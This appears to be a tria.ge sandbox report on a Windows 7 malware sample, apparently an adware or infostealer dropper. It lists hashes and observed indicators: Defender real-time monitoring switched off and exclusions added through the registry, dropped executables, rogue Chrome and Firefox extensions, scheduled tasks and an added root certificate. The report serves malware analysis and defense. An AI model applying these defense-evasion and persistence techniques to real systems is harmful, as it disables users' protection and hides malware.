Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23/09/2022, 18:16
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
6c87eccc9b5cfa464e7126794fcd4b45
-
SHA1
53baf960a4aee75b720223f2a1a0fe9a014c4b61
-
SHA256
cf131c880e391705e5966935d2733fd057056667006e377a4a52bfbc19ec1d55
-
SHA512
90ee3dd05de19cf5f8604599401b906db7bcdb7dc9d42abb8bbe820f7d33d2b6de5429f275ae51316e763637648bd7edc790fe9fb53b01a09e89415693774eb2
-
SSDEEP
196608:91Oz42re29mcd7uG398kseC6HrKNDc7iapONLRrQRW:3OE2re2Qcd/36ks7qKNDc7Pw1RIW
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SHsJRQZsU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QYiUKrukFVUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATZmuaBwNwmU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aJAQLsoDkiWqC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aJAQLsoDkiWqC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATZmuaBwNwmU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QYiUKrukFVUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SHsJRQZsU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fxkldoUMcXUSOxVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fxkldoUMcXUSOxVB = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 29 1540 rundll32.exe 30 1540 rundll32.exe 31 1540 rundll32.exe 32 1540 rundll32.exe 33 1540 rundll32.exe 35 1540 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1964 Install.exe 1564 Install.exe 1812 UfogBZe.exe 1296 byNSWcF.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Control Panel\International\Geo\Nation byNSWcF.exe -
Loads dropped DLL 12 IoCs
pid Process 1148 file.exe 1964 Install.exe 1964 Install.exe 1964 Install.exe 1964 Install.exe 1564 Install.exe 1564 Install.exe 1564 Install.exe 1540 rundll32.exe 1540 rundll32.exe 1540 rundll32.exe 1540 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json byNSWcF.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json byNSWcF.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 byNSWcF.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol UfogBZe.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UfogBZe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 byNSWcF.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini UfogBZe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 byNSWcF.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA byNSWcF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 byNSWcF.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\ATZmuaBwNwmU2\ORBrdHNmWtJJu.dll byNSWcF.exe File created C:\Program Files (x86)\ATZmuaBwNwmU2\vHdfesF.xml byNSWcF.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\XJBnDBP.dll byNSWcF.exe File created C:\Program Files (x86)\QYiUKrukFVUn\OIEkDlE.dll byNSWcF.exe File created C:\Program Files (x86)\SHsJRQZsU\RrHmtJ.dll byNSWcF.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi byNSWcF.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja byNSWcF.exe File created C:\Program Files (x86)\SHsJRQZsU\RGdQoxZ.xml byNSWcF.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\gBJLOqM.xml byNSWcF.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\aQTQyDM.dll byNSWcF.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\kLwflSj.xml byNSWcF.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi byNSWcF.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak byNSWcF.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bNHXguvSZYiOwSiXLC.job schtasks.exe File created C:\Windows\Tasks\VgOpnHVQDAdMZqNFB.job schtasks.exe File created C:\Windows\Tasks\DNDvMcbpefrYjKZ.job schtasks.exe File created C:\Windows\Tasks\mDNVJgqIdbaAfzWWp.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1060 schtasks.exe 1556 schtasks.exe 2032 schtasks.exe 1276 schtasks.exe 1732 schtasks.exe 1928 schtasks.exe 672 schtasks.exe 1736 schtasks.exe 1468 schtasks.exe 808 schtasks.exe 1804 schtasks.exe 432 schtasks.exe 524 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings byNSWcF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EC9DDF5D-3ED3-428D-80EF-FC5E959CE3E9}\WpadDecisionReason = "1" byNSWcF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EC9DDF5D-3ED3-428D-80EF-FC5E959CE3E9}\3a-c6-14-81-70-bb rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 byNSWcF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0094000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 byNSWcF.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EC9DDF5D-3ED3-428D-80EF-FC5E959CE3E9}\WpadNetworkName = "Network 3" byNSWcF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-c6-14-81-70-bb rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-c6-14-81-70-bb\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EC9DDF5D-3ED3-428D-80EF-FC5E959CE3E9}\3a-c6-14-81-70-bb byNSWcF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-c6-14-81-70-bb\WpadDecisionTime = c047bc9989cfd801 byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs byNSWcF.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs byNSWcF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EC9DDF5D-3ED3-428D-80EF-FC5E959CE3E9}\WpadDecisionTime = c047bc9989cfd801 byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot byNSWcF.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-c6-14-81-70-bb\WpadDecisionReason = "1" byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EC9DDF5D-3ED3-428D-80EF-FC5E959CE3E9} byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs byNSWcF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-c6-14-81-70-bb\WpadDecision = "0" byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs byNSWcF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-c6-14-81-70-bb\WpadDecisionTime = c047bc9989cfd801 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs byNSWcF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ byNSWcF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0094000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-c6-14-81-70-bb\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 byNSWcF.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde byNSWcF.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2012 powershell.EXE 2012 powershell.EXE 2012 powershell.EXE 1308 powershell.EXE 1308 powershell.EXE 1308 powershell.EXE 1752 powershell.EXE 1752 powershell.EXE 1752 powershell.EXE 1716 powershell.EXE 1716 powershell.EXE 1716 powershell.EXE 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe 1296 byNSWcF.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2012 powershell.EXE Token: SeDebugPrivilege 1308 powershell.EXE Token: SeDebugPrivilege 1752 powershell.EXE Token: SeDebugPrivilege 1716 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
